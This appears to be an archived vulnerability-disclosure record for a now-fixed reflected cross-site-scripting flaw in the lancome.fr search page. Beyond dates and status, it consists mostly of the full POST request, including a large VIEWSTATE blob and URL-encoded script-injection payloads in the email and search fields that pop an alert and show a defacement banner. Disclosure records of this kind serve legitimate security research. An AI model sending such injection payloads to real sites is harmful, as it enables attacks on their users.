Security researcher Xylitol submitted on 24/01/2009 a cross-site-scripting (XSS) vulnerability affecting www.lancome.fr, which at the time of submission ranked 118240 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/05/2010. It is currently fixed.
Date submitted: 24/01/2009
Date published: 22/05/2010
Date fixed: 22/05/2010
Status: FIXED
Author: Xylitol
Domain: www.lancome.fr
Category: XSS
Pagerank: 118240
URL: http://www.lancome.fr/_fr/_fr/search/results.aspx
POST: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMDkzOTgxOTUzO3Q8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47 bDx0PDtsPGk8Mz47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PDtsPGk8MD47aTwxPjtpPDM%2BO2k8ND47Pj tsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDxAPFw8YnJcPk1lcmNpIGRlIHbD qXJpZmllciB2b3RyZSBhZHJlc3NlIGUtbWFpbC47Pjs7Pjs%2BPjt0PDtsPGk8Mz47PjtsPHQ8QDxcZTs%2BOzs%2BOz4%2BOz4% 2BOz4%2BO3Q8O2w8aTwwPjtpPDE%2BO2k8Mj47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PDtsPGk8MD47Pj tsPHQ8O2w8aTwwPjs%2BO2w8dDxAPE11c3RoYXZlX2xpc3RlX3Byb2R1aXRzOz47Oz47Pj47Pj47Pj47Pj47dDw7bDxpPDA%2BOz 47bDx0PDtsPGk8MT47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PEA8QmVzdFNlbGxlcnNfbGlzdGVfcHJvZH VpdHM7Pjs7Pjs%2BPjs%2BPjs%2BPjs%2BPjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwxPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PD tsPGk8MD47PjtsPHQ8QDxJZGVlc0NhZGVhdXhfamV1bmVfZmVtbWU7Pjs7Pjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjt0PDtsPGk8 MD47PjtsPHQ8O2w8aTwxPjtpPDI%2BO2k8Mz47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PEA8XGU7MDtcZT s%2BOzs%2BOz4%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PEA8MDs%2BOzs%2BOz4%2BOz4%2BO3Q8O2 w8aTwwPjtpPDU%2BO2k8MTA%2BO2k8MTU%2BO2k8MjA%2BO2k8MjU%2BO2k8MzA%2BO2k8MzU%2BO2k8NDA%2BO2k8NDU%2BO2k8 NTA%2BO2k8NTU%2BO2k8NjA%2BO2k8NjU%2BO2k8NzA%2BO2k8NzU%2BO2k8ODA%2BO2k8ODU%2BO2k8OTA%2BOz47bDx0PDtsPG k8MD47PjtsPHQ8QDwxODQ7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPEhvbW1lXD47Li4vY2F0YWxvZy9jYXRlZ2 9yeW1lbi5hc3B4O0FYRU1lbl5GMV9BZ2VGaWdodDs%2BOzs%2BO3Q8QDxBR0UgRklHSFQ7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwx Pjs%2BO2w8dDxAPE1hcXVpbGxhZ2VcPk1hcXVpbGxhZ2UgZGVzIHlldXhcPk1hc2NhcmFzXD47Li4vY2F0YWxvZy9zdWJjYXRlZ2 9yeS5hc3B4O0FYRU1ha2V1cF5GMV9FeWVzXkYyX0V5ZV9NYXNjYXJhc15GM19FeWVfTWFzX0xlbmd0aGVuaW5nOz47Oz47dDxAPE FsbG9uZ2VhbnRzOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QDxTb2lucyB2aXNhZ2VcPjsuLi9jYXRhbG9nL2NhdGVn b3J5LmFzcHg7QVhFU2tpbmNhcmVeRjFfU21vb3RoaW5nOz47Oz47dDxAPEFudGktw6JnZTs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPj 
tpPDE%2BOz47bDx0PEA8Q29ycHMtU29sYWlyZXNcPlNvaW4gZHUgY29ycHNcPlNvaW4gZHUgQ29ycHNcPjsuLi9jYXRhbG9nL2Nh dGVnb3J5LmFzcHg7QVhFQm9keVN1bmNhcmVeRjFfQm9keWNhcmVeRjJfQm9kX0JvZHljYXJlXkYzX0NlbGx1bGl0ZTs%2BOzs%2B O3Q8QDxBbnRpLWNlbGx1bGl0ZTs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjtpPDE%2BOz47bDx0PEA8TWFxdWlsbGFnZVw%2BTWFxdW lsbGFnZSBkdSB0ZWludFw%2BOy4uL2NhdGFsb2cvc3ViY2F0ZWdvcnkuYXNweDtBWEVNYWtldXBeRjFfQ29tcGxleGlvbl5GMl9D b21fU21vb3RoaW5nOz47Oz47dDxAPEFudGktY2VybmVzOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QDxTb2lucyB2aX NhZ2VcPlNvaW4geWV1eCBldCBsw6h2cmVzXD5SaWRlcyAtIE1hbnF1ZSBkZSBmZXJtZXTDqVw%2BOy4uL2NhdGFsb2cvc3ViY2F0 ZWdvcnkuYXNweDtBWEVTa2luY2FyZV5GMV9FeWVzTGlwc15GMl9FeWVfTGlmdGluZ15GM19BbnRpLXdyaW5rbGVzOz47Oz47dDxA PEFudGktUmlkZXMgLSBGZXJtZXTDqTs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjtpPDE%2BOz47bDx0PEA8Q29ycHMtU29sYWlyZXNc PlNvaW5zIHNvbGFpcmVzXD47Li4vY2F0YWxvZy9zdWJjYXRlZ29yeS5hc3B4O0FYRUJvZHlTdW5jYXJlXkYxX1N1bmNhcmVeRjJf U3VuX0FmdGVyU3VuOz47Oz47dDxAPEFwcsOocy1Tb2xlaWw7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPFNvaW5z IHZpc2FnZVw%2BSHlkcmF0YW50cyBzcMOpY2lmaXF1ZXNcPlBlYXV4IE5vcm1hbGVzIMOgIE1peHRlc1w%2BOy4uL2NhdGFsb2cv c3ViY2F0ZWdvcnkuYXNweDtBWEVTa2luY2FyZV5GMV9Nb2lzdHVyaXplcnNeRjJfTW9pX05vcm1hbFNraW5eRjNfTW9pX05vcm1h bF9hcXVhZnVzaW9uOz47Oz47dDxAPEFxdWEgRnVzaW9uOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QDxDb3Jwcy1Tb2 xhaXJlc1w%2BOy4uL2NhdGFsb2cvY2F0ZWdvcnkuYXNweDtBWEVCb2R5U3VuY2FyZV5GMV9Bcm9tYTs%2BOzs%2BO3Q8QDxBcm9t YSBFeHBlcmllbmNlOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QDxDb3Jwcy1Tb2xhaXJlc1w%2BQXJvbWEgRXhwZXJp ZW5jZVw%2BOy4uL2NhdGFsb2cvc3ViY2F0ZWdvcnkuYXNweDtBWEVCb2R5U3VuY2FyZV5GMV9Bcm9tYV5GMl9Bcm9fVG9uaWM7Pj s7Pjt0PEA8QXJvbWEgVG9uaWM7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPENvcnBzLVNvbGFpcmVzXD5Tb2lucy Bzb2xhaXJlc1w%2BOy4uL2NhdGFsb2cvc3ViY2F0ZWdvcnkuYXNweDtBWEVCb2R5U3VuY2FyZV5GMV9TdW5jYXJlXkYyX1N1bl9T ZWxmVGFuOz47Oz47dDxAPEF1dG9icm9uemFudHM7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPFNvaW5zIHZpc2Fn 
ZVw%2BSHlkcmF0YW50cyBzcMOpY2lmaXF1ZXNcPlBlYXV4IE5vcm1hbGVzIMOgIE1peHRlc1w%2BOy4uL2NhdGFsb2cvc3ViY2F0 ZWdvcnkuYXNweDtBWEVTa2luY2FyZV5GMV9Nb2lzdHVyaXplcnNeRjJfTW9pX05vcm1hbFNraW5eRjNfTW9pX05vcm1hbF9iaWVu ZmFpdDs%2BOzs%2BO3Q8QDxCaWVuZmFpdCBNdWx0aS1WaXRhbDs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjtpPDE%2BOz47bDx0PEA8 U29pbnMgdmlzYWdlXD5IeWRyYXRhbnRzIHNww6ljaWZpcXVlc1w%2BUGVhdXggTm9ybWFsZXMgw6AgTWl4dGVzXD47Li4vY2F0YW xvZy9zdWJjYXRlZ29yeS5hc3B4O0FYRVNraW5jYXJlXkYxX01vaXN0dXJpemVyc15GMl9Nb2lfTm9ybWFsU2tpbl5GM19Nb2lfTm 9ybWFsX2JpZW5mYWl0Oz47Oz47dDxAPEJpZW5mYWl0IE11bHRpLVZpdGFsOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8 QDxNYXF1aWxsYWdlXD5NYXF1aWxsYWdlIGR1IHRlaW50XD47Li4vY2F0YWxvZy9zdWJjYXRlZ29yeS5hc3B4O0FYRU1ha2V1cF5G MV9Db21wbGV4aW9uXkYyX0NvbV9CbHVzaGVzOz47Oz47dDxAPEJsdXNoIGV0IElsbHVtaW5hdGV1cnM7Pjs7Pjs%2BPjt0PDtsPG k8MD47aTwxPjs%2BO2w8dDxAPE1hcXVpbGxhZ2VcPk1hcXVpbGxhZ2UgZGVzIGzDqHZyZXNcPlJvdWdlcyDDoCBsw6h2cmVzXD47 Li4vY2F0YWxvZy9zdWJjYXRlZ29yeS5hc3B4O0FYRU1ha2V1cF5GMV9MaXBzXkYyX0xpcF9MaXBzdGlja3NeRjNfTGlwX0xpcF9T aGlueTs%2BOzs%2BO3Q8QDxCcmlsbGFudHM7Pjs7Pjs%2BPjt0PDtsPGk8MD47aTwxPjs%2BO2w8dDxAPDsuLi9oYWlyY2FyZS9p bmRleC5hc3B4O0FYRUhhaXJjYXJlOz47Oz47dDxAPENhcGlsbGFpcmVzOz47Oz47Pj47dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8QD xDYXBpbGxhaXJlc1w%2BOy4uL2NhdGFsb2cvc3ViY2F0ZWdvcnkuYXNweDtBWEVIYWlyY2FyZV5GMl9IYWlyX0NvbG9yZWQ7Pjs7 Pjt0PEA8Q2hldmV1eCBjb2xvcsOpczs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxAPDE7Pjs7Pjs%2BPjs%2BPjs%2BPj s%2BPjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwxPjs% 2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8Mz47PjtsPHQ8QDw7Pjs7Pjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPj s%2BPjs%2BPjs%2BPjs%2BPjs%2BPjs%2BPjtsPF9jdGwwOl9jdGwwOmJyYW5kbGF5b3V0MDpfY3RsMDpfY3RsMzpfY3RsMDpfY3 RsMDpfY3RsMDpfY3RsMDpfY3RsMDpfY3RsMDpzdWJtaXQ7Pj4%3D&_ctl0%3A_ctl0%3Abrandlayout0%3A_ctl0%3A_ctl0%3A _ctl0%3A_ctl1%3Aemail=+%27%22%3E%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%3CM 
ARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXSS+by+Xylitol%3C%2FH1%3E%3C%2FMARQUEE%3E&search=+%27%22%3E%3C% 2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3 EXSS+by+Xylitol%3C%2FH1%3E%3C%2FMARQUEE%3E&_ctl0%3A_ctl0%3Abrandlayout0%3A_ctl0%3A_ctl3%3A_ctl0%3A_c tl0%3A_ctl0%3A_ctl0%3A_ctl0%3A_ctl0%3Alogin=Identifiant&passfake=Mot+de+passe&_ctl0%3A_ctl0%3Abrandl ayout0%3A_ctl0%3A_ctl3%3A_ctl0%3A_ctl0%3A_ctl0%3A_ctl0%3A_ctl0%3A_ctl0%3Apassword=